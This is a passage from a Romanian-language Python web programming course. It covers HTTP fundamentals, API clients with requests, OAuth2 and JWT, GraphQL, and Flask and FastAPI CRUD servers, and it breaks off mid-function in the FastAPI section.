1/1

Programare Web

Lecția 1 ⏱ 90 min

Curs Complet de Programare Web¶

APIs, Comunicare Web, Client-Server, Securitate și Web Scraping — cu Python¶

Cuprins¶

Partea I — Fundamente Web

Arhitectura World Wide Web
Protocolul HTTP — în detaliu
Modelul Client-Server
Formate de date: JSON, XML, HTML
URL-uri, URI-uri și codificarea datelor

Partea II — Consumarea API-urilor (Client)
6. Biblioteca requests — HTTP client complet
7. Autentificarea la API-uri (API Keys, OAuth2, JWT)
8. Paginare, rate limiting și retry
9. WebSockets și comunicare în timp real
10. GraphQL — interogări flexibile

Partea III — Construirea API-urilor (Server)
11. Introducere în framework-uri web Python
12. Flask — de la Hello World la API complet
13. FastAPI — API-uri moderne cu typing și validare
14. REST — principii de design
15. Modele de date, validare și serializare
16. Baze de date și ORM în aplicații web
17. Background tasks, cozi și procesare asincronă

Partea IV — Web Scraping
18. Fundamente web scraping — HTML parsing
19. BeautifulSoup — extragerea datelor din HTML
20. Scraping avansat — Selenium și Playwright
21. Scrapy — framework de scraping la scară
22. Etică, legalitate și bune practici

Partea V — Securitate Web
23. OWASP Top 10 — vulnerabilități critice
24. Autentificare și autorizare
25. CORS, CSRF, CSP și headere de securitate
26. HTTPS, TLS și criptarea comunicațiilor
27. Rate limiting, input validation și sanitizare

Partea VI — Arhitecturi și Patterns Avansate
28. Microservicii și comunicare inter-servicii
29. API Gateway și service mesh
30. Caching la nivel web (Redis, CDN, HTTP cache)
31. Testarea aplicațiilor web
32. Deployment și producție

PARTEA I — FUNDAMENTE WEB¶

1. Arhitectura World Wide Web¶

1.1 Cum funcționează web-ul¶

Ce se întâmplă când tastezi https://www.example.com în browser:

1. DNS Resolution
   Browser → DNS Resolver → "Care e IP-ul pentru www.example.com?"
   Răspuns: 93.184.216.34

2. TCP Connection (Three-Way Handshake)
   Browser ←→ Server: SYN → SYN-ACK → ACK
   Conexiune TCP stabilită pe portul 443 (HTTPS)

3. TLS Handshake
   Browser ←→ Server: negociere criptare, verificare certificat
   Canal criptat stabilit

4. HTTP Request
   Browser → Server:
   GET / HTTP/1.1
   Host: www.example.com
   Accept: text/html

5. Server Processing
   Server primește cererea → procesează (routing, logică, DB) → generează răspuns

6. HTTP Response
   Server → Browser:
   HTTP/1.1 200 OK
   Content-Type: text/html
   <html>...</html>

7. Browser Rendering
   Parsează HTML → Descarcă CSS, JS, imagini → Construiește DOM → Afișează pagina

Timp total tipic: 100-500ms (depinde de locație, server, complexitate)

1.2 Componentele ecosistemului web¶

┌─────────────────────────────────────────────────────────────┐
│                     FRONTEND (Client)                        │
│  Browser: Chrome, Firefox, Safari, Edge                      │
│  Tehnologii: HTML, CSS, JavaScript, TypeScript               │
│  Framework-uri: React, Vue, Angular, Svelte                  │
│  Mobile: React Native, Flutter, Swift, Kotlin                │
├─────────────────────────────────────────────────────────────┤
│                   COMUNICARE (Transport)                      │
│  HTTP/1.1, HTTP/2, HTTP/3 (QUIC)                            │
│  WebSocket (bidirecțional, persistent)                       │
│  gRPC (Protocol Buffers, binar, eficient)                    │
│  Server-Sent Events (SSE — unidirecțional, server→client)   │
├─────────────────────────────────────────────────────────────┤
│                     BACKEND (Server)                         │
│  Python: Flask, FastAPI, Django                              │
│  Node.js: Express, Fastify, NestJS                          │
│  Go: Gin, Echo, Fiber                                        │
│  Java: Spring Boot                                           │
│  Rust: Actix-web, Axum                                       │
├─────────────────────────────────────────────────────────────┤
│                     DATE (Persistență)                        │
│  SQL: PostgreSQL, MySQL, SQLite                              │
│  NoSQL: MongoDB, Redis, DynamoDB                             │
│  Search: Elasticsearch                                       │
│  Cache: Redis, Memcached                                     │
│  Queue: RabbitMQ, Kafka, SQS                                │
└─────────────────────────────────────────────────────────────┘

2. Protocolul HTTP — în detaliu¶

2.1 Structura unei cereri HTTP¶

POST /api/users HTTP/1.1                    ← Linia de cerere (method, path, version)
Host: api.example.com                       ← Header obligatoriu
Content-Type: application/json              ← Tipul datelor trimise
Authorization: Bearer eyJhbGciOi...         ← Token de autentificare
Accept: application/json                    ← Ce format acceptăm în răspuns
User-Agent: python-requests/2.31.0         ← Client-ul care face cererea
Content-Length: 56                           ← Dimensiunea body-ului
                                            ← Linie goală (separator header/body)
{"name": "Ana Pop", "email": "ana@ex.com"}  ← Body (corpul cererii)

2.2 Structura unui răspuns HTTP¶

HTTP/1.1 201 Created                        ← Linia de stare (version, status code, reason)
Content-Type: application/json              ← Tipul datelor returnate
Location: /api/users/42                     ← URI-ul resursei create
X-Request-Id: abc-123-def                   ← Header custom (tracing)
Set-Cookie: session=xyz; HttpOnly; Secure   ← Cookie
Cache-Control: no-cache                     ← Instrucțiuni de caching
                                            ← Linie goală
{"id": 42, "name": "Ana Pop", ...}         ← Body (corpul răspunsului)

2.3 Metodele HTTP¶

Metoda    Scop                  Idempotent  Safe  Body    Utilizare tipică
────────────────────────────────────────────────────────────────────────────
GET       Citire resursă        Da          Da    Nu*     Obținere date
POST      Creare resursă        Nu          Nu    Da      Creare, acțiuni
PUT       Înlocuire completă    Da          Nu    Da      Update complet
PATCH     Modificare parțială   Nu**        Nu    Da      Update parțial
DELETE    Ștergere resursă      Da          Nu    Nu*     Ștergere
HEAD      Ca GET dar fără body  Da          Da    Nu      Verificare existență
OPTIONS   Capabilități server   Da          Da    Nu      CORS preflight

Idempotent = apeluri repetate produc același rezultat
Safe = nu modifică starea serverului
* Poate avea body tehnic, dar e neconvențional
** Poate fi implementat idempotent

2.4 Codurile de stare HTTP¶

1xx — Informational (rar întâlnite direct):
  100 Continue                 Server-ul acceptă cererea, trimite restul
  101 Switching Protocols      Upgrade la WebSocket

2xx — Succes:
  200 OK                      Cerere reușită (GET, PUT, PATCH, DELETE)
  201 Created                 Resursă creată cu succes (POST) → include Location
  204 No Content              Succes fără body (DELETE, PUT)
  206 Partial Content          Răspuns parțial (download cu Range)

3xx — Redirecționare:
  301 Moved Permanently       Resursă mutată permanent (SEO: Google actualizează)
  302 Found                   Redirecționare temporară
  304 Not Modified            Cache valid, nu retrimite body-ul
  307 Temporary Redirect      Ca 302, dar păstrează metoda HTTP
  308 Permanent Redirect      Ca 301, dar păstrează metoda HTTP

4xx — Eroare client:
  400 Bad Request             Cerere malformată, validare eșuată
  401 Unauthorized            Autentificare necesară (lipsă sau invalidă)
  403 Forbidden               Autentificat dar NU autorizat
  404 Not Found               Resursa nu există
  405 Method Not Allowed      Metoda HTTP nu e suportată pe această rută
  409 Conflict                Conflict (ex: duplicate, versiune veche)
  413 Payload Too Large       Body-ul depășește limita
  415 Unsupported Media Type  Content-Type neacceptat
  422 Unprocessable Entity    Validare semantică eșuată (format OK, date invalide)
  429 Too Many Requests       Rate limit depășit → include Retry-After header

5xx — Eroare server:
  500 Internal Server Error   Eroare neașteptată pe server (bug, crash)
  502 Bad Gateway             Proxy/LB nu poate contacta backend-ul
  503 Service Unavailable     Server supraîncărcat sau în mentenanță
  504 Gateway Timeout         Backend-ul nu a răspuns la timp

2.5 Headere HTTP importante¶

# Headere de cerere (Request):
headers = {
    "Host": "api.example.com",            # Domeniul (obligatoriu HTTP/1.1)
    "Authorization": "Bearer eyJ...",      # Autentificare
    "Content-Type": "application/json",    # Tipul body-ului TRIMIS
    "Accept": "application/json",          # Ce ACCEPTĂM în răspuns
    "Accept-Language": "ro,en;q=0.9",      # Limba preferată
    "Accept-Encoding": "gzip, deflate",    # Compresie acceptată
    "User-Agent": "MyApp/1.0",            # Identificare client
    "If-None-Match": '"abc123"',           # Conditional GET (ETag)
    "If-Modified-Since": "Mon, 01 Jan...", # Conditional GET (dată)
    "Cache-Control": "no-cache",           # Instrucțiuni cache
    "Cookie": "session=xyz",               # Cookie-uri
    "X-Request-ID": "uuid-trace-id",       # Tracing distribuit
}

# Headere de răspuns (Response):
# Content-Type: application/json; charset=utf-8
# Content-Length: 1234
# Cache-Control: public, max-age=3600     # Cache 1 oră
# ETag: "abc123"                           # Versiune resursă (cache validation)
# Last-Modified: Mon, 01 Jan 2024 ...     # Ultima modificare
# Set-Cookie: session=xyz; HttpOnly; Secure; SameSite=Lax
# X-RateLimit-Limit: 100                  # Limita pe fereastră
# X-RateLimit-Remaining: 73               # Cereri rămase
# X-RateLimit-Reset: 1704067200           # Timestamp resetare
# Location: /api/users/42                  # URI resursa creată (201)
# Retry-After: 60                          # Secunde de așteptare (429/503)

# Headere de securitate:
# Strict-Transport-Security: max-age=31536000; includeSubDomains
# X-Content-Type-Options: nosniff
# X-Frame-Options: DENY
# Content-Security-Policy: default-src 'self'
# X-XSS-Protection: 0  (deprecat, CSP e superior)

2.6 HTTP/2 și HTTP/3¶

HTTP/1.1:
  - Un request/response pe conexiune (sau pipelining, rar folosit)
  - Head-of-line blocking (al doilea request așteaptă primul)
  - Headere în text, necomprimate, repetitive
  - Workaround: multiple conexiuni TCP (6-8 per domeniu)

HTTP/2:
  - Multiplexare: multiple request-uri SIMULTAN pe o singură conexiune TCP
  - Header compression (HPACK): reduce dramatic dimensiunea headerelor
  - Server Push: serverul trimite resurse ÎNAINTE să le ceară clientul
  - Stream prioritization: resurse importante primite primul
  - Binary framing: mai eficient decât text

HTTP/3 (QUIC):
  - Bazat pe UDP (nu TCP) → elimină head-of-line blocking la nivel transport
  - Handshake mai rapid (0-RTT sau 1-RTT vs. TCP+TLS = 3-RTT)
  - Migración de conexiune (schimbi rețeaua, conexiunea persistă)
  - Performanță superioară pe rețele instabile (mobile, WiFi)

3. Modelul Client-Server¶

3.1 Arhitectura tradițională¶

┌──────────┐         HTTP Request          ┌──────────┐
│  CLIENT  │ ────────────────────────────► │  SERVER  │
│          │                               │          │
│ Browser  │ ◄──────────────────────────── │ Flask /  │
│ Mobile   │         HTTP Response         │ FastAPI  │
│ Script   │                               │ Django   │
│ CLI      │                               │          │
└──────────┘                               └────┬─────┘
                                                │
                                           ┌────▼─────┐
                                           │ DATABASE │
                                           └──────────┘

Modele de comunicare:
  Request-Response (sincron): client trimite, server răspunde, client așteaptă
  Pub-Sub (asincron): client se abonează, server publică mesaje
  Push (server-initiated): server trimite date fără cerere (WebSocket, SSE)
  Polling: client întreabă periodic dacă sunt date noi (ineficient)
  Long Polling: client întreabă, server ține conexiunea deschisă până are date

3.2 API (Application Programming Interface)¶

API-ul definește CONTRACTUL dintre client și server:
  - Ce endpoint-uri sunt disponibile (URL-uri)
  - Ce metode HTTP acceptă fiecare
  - Ce parametri primește (query, path, body)
  - Ce format au datele (JSON, XML)
  - Ce răspunsuri returnează (status codes, structura datelor)
  - Cum se autentifică clientul

Tipuri de API-uri web:
  REST (Representational State Transfer): cel mai comun, bazat pe resurse
  GraphQL: client-ul specifică exact ce date vrea
  gRPC: Protocol Buffers, binar, eficient, tipizat
  SOAP: XML, enterprise legacy, complex
  WebSocket: bidirecțional, persistent, real-time

4. Formate de date: JSON, XML, HTML¶

4.1 JSON (JavaScript Object Notation)¶

import json

# JSON — formatul dominant pentru API-uri web
data = {
    "id": 42,
    "name": "Ana Pop",
    "email": "ana@example.com",
    "age": 21,
    "active": True,          # Python True → JSON true
    "address": None,         # Python None → JSON null
    "courses": [
        {"name": "Algebra", "grade": 9.5},
        {"name": "Programming", "grade": 10.0}
    ],
    "tags": ["student", "scholarship"]
}

# Serializare (Python dict → JSON string):
json_string = json.dumps(data, indent=2, ensure_ascii=False)
print(json_string)

# Deserializare (JSON string → Python dict):
parsed = json.loads(json_string)
print(parsed["courses"][0]["name"])    # "Algebra"

# Scriere/citire fișier JSON:
with open("data.json", "w", encoding="utf-8") as f:
    json.dump(data, f, indent=2, ensure_ascii=False)

with open("data.json", "r") as f:
    loaded = json.load(f)

# Tipuri JSON ↔ Python:
# JSON object  {}     ↔  Python dict
# JSON array   []     ↔  Python list
# JSON string  ""     ↔  Python str
# JSON number  42/3.14 ↔ Python int/float
# JSON boolean true/false ↔ Python True/False
# JSON null           ↔  Python None

4.2 XML¶

import xml.etree.ElementTree as ET

# XML — format mai verbose, folosit în SOAP, RSS, configurări
xml_string = """<?xml version="1.0" encoding="UTF-8"?>
<student id="42">
    <name>Ana Pop</name>
    <email>ana@example.com</email>
    <courses>
        <course grade="9.5">Algebra</course>
        <course grade="10.0">Programming</course>
    </courses>
</student>"""

root = ET.fromstring(xml_string)
print(root.attrib["id"])                    # "42"
print(root.find("name").text)               # "Ana Pop"

for course in root.findall(".//course"):
    print(f"{course.text}: {course.attrib['grade']}")

5. URL-uri, URI-uri și codificarea datelor¶

from urllib.parse import urlparse, urlencode, quote, parse_qs

# Anatomia unui URL:
# https://api.example.com:8443/v2/users?status=active&page=2#results
# ├─────┤ ├───────────────┤├──┤├──────┤├────────────────────┤├─────┤
# scheme    host           port path    query string         fragment

url = "https://api.example.com:8443/v2/users?status=active&page=2#results"
parsed = urlparse(url)
print(parsed.scheme)     # "https"
print(parsed.hostname)   # "api.example.com"
print(parsed.port)       # 8443
print(parsed.path)       # "/v2/users"
print(parsed.query)      # "status=active&page=2"
print(parsed.fragment)   # "results"

# Parsare query string:
params = parse_qs(parsed.query)
print(params)            # {'status': ['active'], 'page': ['2']}

# Codificare URL (caractere speciale):
print(quote("Ana Pop & Marin"))          # "Ana%20Pop%20%26%20Marin"
print(urlencode({"q": "Python & web", "page": 1}))  # "q=Python+%26+web&page=1"

# Construcție URL sigură:
from urllib.parse import urljoin
base = "https://api.example.com/v2/"
print(urljoin(base, "users/42"))         # "https://api.example.com/v2/users/42"

PARTEA II — CONSUMAREA API-URILOR (CLIENT)¶

6. Biblioteca `requests` — HTTP client complet¶

6.1 Operații fundamentale¶

import requests

# === GET — citire date ===
response = requests.get("https://jsonplaceholder.typicode.com/posts/1")

print(response.status_code)      # 200
print(response.headers["Content-Type"])  # "application/json; charset=utf-8"
print(response.json())           # dict Python (deserializare automată)
print(response.text)             # string brut
print(response.elapsed)          # timedelta (durata request-ului)
print(response.url)              # URL-ul final (după redirectări)

# GET cu parametri query:
params = {"userId": 1, "completed": "true"}
response = requests.get(
    "https://jsonplaceholder.typicode.com/todos",
    params=params    # → ?userId=1&completed=true
)
todos = response.json()
print(f"Found {len(todos)} completed todos")

# === POST — creare resursă ===
new_post = {
    "title": "My Post",
    "body": "Content here",
    "userId": 1
}
response = requests.post(
    "https://jsonplaceholder.typicode.com/posts",
    json=new_post    # Serializare automată + Content-Type: application/json
)
print(response.status_code)    # 201 Created
print(response.json()["id"])   # ID-ul resursei create

# === PUT — înlocuire completă ===
updated = {"id": 1, "title": "Updated Title", "body": "New body", "userId": 1}
response = requests.put(
    "https://jsonplaceholder.typicode.com/posts/1",
    json=updated
)

# === PATCH — modificare parțială ===
partial = {"title": "Only Title Changed"}
response = requests.patch(
    "https://jsonplaceholder.typicode.com/posts/1",
    json=partial
)

# === DELETE — ștergere ===
response = requests.delete("https://jsonplaceholder.typicode.com/posts/1")
print(response.status_code)    # 200 (sau 204 No Content)

6.2 Headere, timeout, sesiuni¶

# Headere custom:
headers = {
    "Authorization": "Bearer my-token-here",
    "Accept": "application/json",
    "X-Custom-Header": "value"
}
response = requests.get("https://api.example.com/data", headers=headers)

# Timeout (MEREU folosește timeout în producție!):
try:
    response = requests.get(
        "https://api.example.com/slow-endpoint",
        timeout=(3.05, 27)   # (connect_timeout, read_timeout) în secunde
    )
except requests.Timeout:
    print("Request a expirat!")
except requests.ConnectionError:
    print("Nu s-a putut conecta la server!")
except requests.RequestException as e:
    print(f"Eroare request: {e}")

# Sesiuni (reutilizează conexiunea TCP, persistă cookie-uri):
session = requests.Session()
session.headers.update({"Authorization": "Bearer token123"})
session.verify = True    # Verificare certificat SSL (default True)

# Toate request-urile din sesiune au header-ul de Authorization:
r1 = session.get("https://api.example.com/users")
r2 = session.get("https://api.example.com/posts")
session.close()

# Sau cu context manager:
with requests.Session() as s:
    s.headers["Authorization"] = "Bearer token123"
    users = s.get("https://api.example.com/users").json()

# Upload fișiere:
files = {"file": ("document.pdf", open("document.pdf", "rb"), "application/pdf")}
response = requests.post("https://api.example.com/upload", files=files)

# Trimitere form data (nu JSON):
data = {"username": "ana", "password": "secret"}
response = requests.post("https://example.com/login", data=data)
# Content-Type: application/x-www-form-urlencoded (automat)

# Verificare răspuns (raise la erori):
response = requests.get("https://api.example.com/data")
response.raise_for_status()   # Raise HTTPError dacă status >= 400

6.3 Tratarea răspunsurilor¶

def fetch_user(user_id: int) -> dict | None:
    """Exemplu robust de consumare API."""
    url = f"https://api.example.com/users/{user_id}"

    try:
        response = requests.get(url, timeout=10)

        match response.status_code:
            case 200:
                return response.json()
            case 404:
                print(f"User {user_id} not found")
                return None
            case 401:
                raise PermissionError("Authentication failed")
            case 429:
                retry_after = int(response.headers.get("Retry-After", 60))
                print(f"Rate limited. Retry after {retry_after}s")
                return None
            case status if 500 <= status < 600:
                print(f"Server error: {status}")
                return None
            case _:
                response.raise_for_status()

    except requests.Timeout:
        print("Request timeout")
    except requests.ConnectionError:
        print("Connection failed")
    except requests.JSONDecodeError:
        print("Invalid JSON in response")

    return None

7. Autentificarea la API-uri¶

7.1 API Key¶

# Metoda 1: în header
headers = {"X-API-Key": "your-api-key-here"}
response = requests.get("https://api.example.com/data", headers=headers)

# Metoda 2: în query parameter (mai puțin sigur — apare în loguri)
params = {"api_key": "your-api-key-here"}
response = requests.get("https://api.example.com/data", params=params)

7.2 OAuth2 — fluxul complet¶

# OAuth2 Authorization Code Flow (pentru aplicații web cu backend):

# Pas 1: Redirecționare utilizator la provider (Google, GitHub, etc.)
auth_url = (
    "https://accounts.google.com/o/oauth2/v2/auth?"
    "client_id=YOUR_CLIENT_ID&"
    "redirect_uri=http://localhost:8000/callback&"
    "response_type=code&"
    "scope=openid email profile&"
    "state=random-csrf-token"
)
# Utilizatorul se autentifică și autorizează → redirectat la callback cu ?code=XXX

# Pas 2: Schimbarea codului pentru un token (server-side)
token_response = requests.post(
    "https://oauth2.googleapis.com/token",
    data={
        "grant_type": "authorization_code",
        "code": "AUTHORIZATION_CODE_FROM_CALLBACK",
        "redirect_uri": "http://localhost:8000/callback",
        "client_id": "YOUR_CLIENT_ID",
        "client_secret": "YOUR_CLIENT_SECRET",
    }
)
tokens = token_response.json()
access_token = tokens["access_token"]
refresh_token = tokens.get("refresh_token")

# Pas 3: Utilizare access token
headers = {"Authorization": f"Bearer {access_token}"}
user_info = requests.get(
    "https://www.googleapis.com/oauth2/v3/userinfo",
    headers=headers
).json()
print(f"Welcome, {user_info['name']}!")

# Pas 4: Refresh token (când access token expiră)
refresh_response = requests.post(
    "https://oauth2.googleapis.com/token",
    data={
        "grant_type": "refresh_token",
        "refresh_token": refresh_token,
        "client_id": "YOUR_CLIENT_ID",
        "client_secret": "YOUR_CLIENT_SECRET",
    }
)
new_access_token = refresh_response.json()["access_token"]

7.3 JWT (JSON Web Token)¶

import jwt  # pip install PyJWT
from datetime import datetime, timedelta

SECRET_KEY = "your-secret-key-min-256-bits"

# Creare JWT:
payload = {
    "sub": "user-42",                                    # Subject (user ID)
    "name": "Ana Pop",
    "role": "admin",
    "iat": datetime.utcnow(),                            # Issued At
    "exp": datetime.utcnow() + timedelta(hours=1),       # Expiration
    "iss": "myapp.example.com",                          # Issuer
}
token = jwt.encode(payload, SECRET_KEY, algorithm="HS256")
print(token)
# eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJ1c2...

# Structura JWT: HEADER.PAYLOAD.SIGNATURE
# Header:    {"alg": "HS256", "typ": "JWT"}  (base64url)
# Payload:   {"sub": "user-42", ...}          (base64url)
# Signature: HMAC-SHA256(header.payload, secret)

# Verificare și decodare JWT:
try:
    decoded = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
    print(decoded["sub"])    # "user-42"
    print(decoded["role"])   # "admin"
except jwt.ExpiredSignatureError:
    print("Token expirat!")
except jwt.InvalidTokenError:
    print("Token invalid!")

# Folosire în request-uri:
headers = {"Authorization": f"Bearer {token}"}
response = requests.get("https://api.example.com/protected", headers=headers)

8. Paginare, rate limiting și retry¶

import time
import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

# === Paginare cursor-based (recomandat) ===
def fetch_all_items(base_url: str, api_key: str) -> list[dict]:
    """Iterează prin toate paginile unui API."""
    items = []
    url = f"{base_url}/items"
    params = {"limit": 100}

    while url:
        response = requests.get(url, headers={"X-API-Key": api_key}, params=params)
        response.raise_for_status()
        data = response.json()

        items.extend(data["results"])
        url = data.get("next")     # URL-ul paginii următoare (sau None)
        params = {}                 # Params sunt deja în URL-ul next

        print(f"Fetched {len(items)} / {data.get('total', '?')} items")

    return items

# === Paginare offset-based ===
def fetch_paginated(base_url: str, per_page: int = 50) -> list[dict]:
    items = []
    page = 1

    while True:
        response = requests.get(
            f"{base_url}/items",
            params={"page": page, "per_page": per_page},
            timeout=10
        )
        data = response.json()
        if not data["results"]:
            break
        items.extend(data["results"])
        page += 1

    return items

# === Retry automat cu backoff exponențial ===
def create_resilient_session() -> requests.Session:
    """Creează o sesiune HTTP cu retry automat."""
    session = requests.Session()

    retry_strategy = Retry(
        total=5,                       # Maximum 5 reîncercări
        backoff_factor=1,              # 1s, 2s, 4s, 8s, 16s
        status_forcelist=[429, 500, 502, 503, 504],
        allowed_methods=["GET", "POST", "PUT", "DELETE"],
        respect_retry_after_header=True  # Respectă Retry-After de la 429
    )

    adapter = HTTPAdapter(
        max_retries=retry_strategy,
        pool_connections=10,            # Conexiuni TCP persistente
        pool_maxsize=20
    )
    session.mount("https://", adapter)
    session.mount("http://", adapter)

    return session

# Utilizare:
session = create_resilient_session()
session.headers["Authorization"] = "Bearer token"
response = session.get("https://api.example.com/data", timeout=30)
# Dacă primește 503 → reîncercare automată cu backoff

# === Rate limiting manual ===
import time
from collections import deque

class RateLimiter:
    """Token bucket rate limiter."""
    def __init__(self, calls_per_second: float):
        self.min_interval = 1.0 / calls_per_second
        self.last_call = 0.0

    def wait(self):
        elapsed = time.monotonic() - self.last_call
        if elapsed < self.min_interval:
            time.sleep(self.min_interval - elapsed)
        self.last_call = time.monotonic()

limiter = RateLimiter(calls_per_second=10)   # Max 10 req/sec

for item_id in range(100):
    limiter.wait()
    response = requests.get(f"https://api.example.com/items/{item_id}")

9. WebSockets și comunicare în timp real¶

# === WebSocket Client ===
import asyncio
import websockets
import json

async def websocket_client():
    uri = "wss://stream.example.com/ws"

    async with websockets.connect(uri) as ws:
        # Trimitere mesaj:
        await ws.send(json.dumps({
            "action": "subscribe",
            "channels": ["prices", "notifications"]
        }))

        # Recepție continuă:
        async for message in ws:
            data = json.loads(message)
            print(f"Received: {data}")

            if data.get("type") == "price_update":
                print(f"  {data['symbol']}: {data['price']}")
            elif data.get("type") == "notification":
                print(f"  Alert: {data['message']}")

# asyncio.run(websocket_client())

# === Server-Sent Events (SSE) — unidirecțional, simplu ===
import requests

def listen_sse(url: str):
    """Ascultă un stream de Server-Sent Events."""
    response = requests.get(url, stream=True, headers={"Accept": "text/event-stream"})

    for line in response.iter_lines(decode_unicode=True):
        if line.startswith("data: "):
            data = json.loads(line[6:])
            print(f"Event: {data}")

# WebSocket vs. SSE vs. Polling:
#   WebSocket: bidirecțional, persistent, complex
#   SSE:       server→client only, simplu, auto-reconnect, HTTP nativ
#   Polling:   client→server periodic, simplu, ineficient
#   Long-Poll: server ține conexiunea deschisă, mai eficient ca polling

10. GraphQL — interogări flexibile¶

import requests

GRAPHQL_URL = "https://api.example.com/graphql"

# Interogare — clientul specifică EXACT ce câmpuri vrea:
query = """
query GetUser($id: ID!) {
    user(id: $id) {
        name
        email
        posts(limit: 5) {
            title
            createdAt
            comments {
                author { name }
                text
            }
        }
    }
}
"""

response = requests.post(
    GRAPHQL_URL,
    json={
        "query": query,
        "variables": {"id": "42"}
    },
    headers={"Authorization": "Bearer token"}
)

data = response.json()
user = data["data"]["user"]
print(f"User: {user['name']}")
for post in user["posts"]:
    print(f"  Post: {post['title']} ({len(post['comments'])} comments)")

# Mutație (modificare date):
mutation = """
mutation CreatePost($input: PostInput!) {
    createPost(input: $input) {
        id
        title
    }
}
"""
response = requests.post(
    GRAPHQL_URL,
    json={
        "query": mutation,
        "variables": {"input": {"title": "New Post", "body": "Content..."}}
    }
)

# GraphQL vs. REST:
# REST:    multiple endpoint-uri (/users, /users/42, /users/42/posts)
#          over-fetching (primești câmpuri de care nu ai nevoie)
#          under-fetching (ai nevoie de multiple request-uri)
# GraphQL: un singur endpoint (/graphql)
#          clientul specifică exact ce vrea
#          un singur request pentru date complexe
#          mai complex pe server, caching mai dificil

PARTEA III — CONSTRUIREA API-URILOR (SERVER)¶

12. Flask — de la Hello World la API complet¶

from flask import Flask, request, jsonify, abort
from functools import wraps

app = Flask(__name__)

# Bază de date simulată:
users_db = {}
next_id = 1

# === Middleware: autentificare simplă ===
def require_auth(f):
    @wraps(f)
    def decorated(*args, **kwargs):
        token = request.headers.get("Authorization", "").removeprefix("Bearer ")
        if token != "secret-token":
            return jsonify({"error": "Unauthorized"}), 401
        return f(*args, **kwargs)
    return decorated

# === Error handlers ===
@app.errorhandler(404)
def not_found(e):
    return jsonify({"error": "Resource not found"}), 404

@app.errorhandler(400)
def bad_request(e):
    return jsonify({"error": str(e.description)}), 400

# === CRUD API ===

# GET /api/users — listare cu filtrare și paginare
@app.route("/api/users", methods=["GET"])
def list_users():
    page = request.args.get("page", 1, type=int)
    per_page = request.args.get("per_page", 10, type=int)
    name_filter = request.args.get("name", "")

    filtered = [u for u in users_db.values()
                if name_filter.lower() in u["name"].lower()]
    total = len(filtered)
    start = (page - 1) * per_page
    paginated = filtered[start:start + per_page]

    return jsonify({
        "data": paginated,
        "total": total,
        "page": page,
        "per_page": per_page,
        "pages": (total + per_page - 1) // per_page
    })

# GET /api/users/<id> — citire un user
@app.route("/api/users/<int:user_id>", methods=["GET"])
def get_user(user_id):
    user = users_db.get(user_id)
    if not user:
        abort(404)
    return jsonify(user)

# POST /api/users — creare user
@app.route("/api/users", methods=["POST"])
@require_auth
def create_user():
    global next_id
    data = request.get_json()

    if not data or not data.get("name") or not data.get("email"):
        abort(400, description="Fields 'name' and 'email' are required")

    if any(u["email"] == data["email"] for u in users_db.values()):
        return jsonify({"error": "Email already exists"}), 409

    user = {
        "id": next_id,
        "name": data["name"],
        "email": data["email"],
        "active": data.get("active", True)
    }
    users_db[next_id] = user
    next_id += 1

    return jsonify(user), 201, {"Location": f"/api/users/{user['id']}"}

# PUT /api/users/<id> — update complet
@app.route("/api/users/<int:user_id>", methods=["PUT"])
@require_auth
def update_user(user_id):
    if user_id not in users_db:
        abort(404)
    data = request.get_json()
    users_db[user_id].update({
        "name": data["name"],
        "email": data["email"],
        "active": data.get("active", True)
    })
    return jsonify(users_db[user_id])

# DELETE /api/users/<id> — ștergere
@app.route("/api/users/<int:user_id>", methods=["DELETE"])
@require_auth
def delete_user(user_id):
    if user_id not in users_db:
        abort(404)
    del users_db[user_id]
    return "", 204

if __name__ == "__main__":
    app.run(debug=True, host="0.0.0.0", port=5000)

13. FastAPI — API-uri moderne cu typing și validare¶

from fastapi import FastAPI, HTTPException, Depends, Query, Path, Header, status
from fastapi.security import HTTPBearer, HTTPAuthorizationCredentials
from pydantic import BaseModel, EmailStr, Field
from datetime import datetime
from typing import Annotated

app = FastAPI(
    title="University API",
    description="API pentru managementul studenților",
    version="2.0.0",
)

# === Modele Pydantic (validare automată!) ===
class UserCreate(BaseModel):
    """Schema pentru crearea unui user."""
    name: str = Field(..., min_length=2, max_length=100, examples=["Ana Pop"])
    email: EmailStr = Field(..., examples=["ana@example.com"])
    age: int = Field(ge=16, le=120, examples=[21])
    active: bool = True

class UserResponse(BaseModel):
    """Schema pentru răspuns."""
    id: int
    name: str
    email: str
    age: int
    active: bool
    created_at: datetime

    model_config = {"from_attributes": True}

class UserList(BaseModel):
    data: list[UserResponse]
    total: int
    page: int
    pages: int

class ErrorResponse(BaseModel):
    detail: str

# === Security ===
security = HTTPBearer()

async def verify_token(
    credentials: Annotated[HTTPAuthorizationCredentials, Depends(security)]
) -> str:
    if credentials.credentials != "secret-token":
        raise HTTPException(status_code=401, detail="Invalid token")
    return credentials.credentials

# === In-memory storage ===
db: dict[int, dict] = {}
counter = 0

# === Endpoints ===

@app.get("/api/users", response_model=UserList, tags=["users"])
async def list_users(
    page: Annotated[int, Query(ge=1, description="Numărul paginii")] = 1,
    per_page: Annotated[int, Query(ge=1, le=100)] = 10,
    name: Annotated[str | None, Query(description="Filtru după nume")] = None,
    active: Annotated[bool | None, Query()] = None,
):
    """Listează utilizatorii cu filtrare și paginare."""
    filtered = list(db.values())
    if name:
        filtered = [u for u in filtered if name.lower() in u["name"].lower()]
    if active is not None:
        filtered = [u for u in filtered if u["active"] == active]

    total = len(filtered)
    start = (page - 1) * per_page

    return UserList(
        data=filtered[start:start + per_page],
        total=total,
        page=page,
        pages=max(1, (total + per_page - 1) // per_page)
    )

@app.get("/api/users/{user_id}", response_model=UserResponse, tags=["users"],
         responses={404: {"model": ErrorResponse}})
async def get_user(
    user_id: Annotated[int, Path(ge=1, description="ID-ul utilizatorului")]
):
    """Obține un utilizator după ID."""
    if user_id not in db:
        raise HTTPException(status_code=404, detail="User not found")
    return db[user_id]

@app.post("/api/users", response_model=UserResponse, status_code=201, tags=["users"])
async def create_user(
    user: UserCreate,
    token: Annotated[str, Depends(verify_token)]
):
    """Creează un utilizator nou. Necesită autentificare."""
    global counter

    if any(u["email"] == user.email for u in db.values()):
        raise HTTPException(status_code=409, detail="Email already exists")

    counter += 1
    record = {
        "id": counter,
        **user.model_dump(),
        "created_at": datetime.now()
    }
    db[counter] = record
    return record

@app.delete("/api/users/{user_id}", status_code=204, tags=["users"])
async def delete_user(
    user_id: int,
    token: Annotated[str, Depends(verify_token)]
):
    """Șterge un utilizator."""
    if user_id not in db:
